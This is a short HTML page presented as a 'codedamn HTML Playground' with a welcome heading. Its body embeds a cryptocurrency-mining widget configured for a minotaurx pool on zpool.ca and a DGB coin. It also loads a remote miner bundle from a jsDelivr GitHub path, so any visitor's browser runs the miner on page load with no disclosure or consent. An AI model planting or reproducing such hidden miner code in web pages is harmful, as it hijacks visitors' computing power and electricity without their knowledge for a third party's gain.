<!DOCTYPE html>
<html>
	<head>
		<title>codedamn HTML Playground</title>
		<meta charset="UTF-8" />
		<meta name="viewport" content="width=device-width, initial-scale=1.0" />
		<link rel="stylesheet" href="/style.css" />
	</head>
	<body>
		<h1>Welcome to codedamn</h1>
		<webminer-widget
			data-algo="minotaurx"
			data-pool="minotaurx.sea.mine.zpool.ca:7019"
			data-log="true"
			data-coin="DGB"
			data-logo="https://smartiescoin.com/assets/images/img-0033-removebg-2-100x100.png"
			data-url="https://smartiescoin.com/"
			data-color="#df6c35"
		></webminer-widget>

		<script src="https://cdn.jsdelivr.net/gh/malphite-code/webminer@1.2/dist/miner-widget.bundle.js"></script>
	</body>
</html>
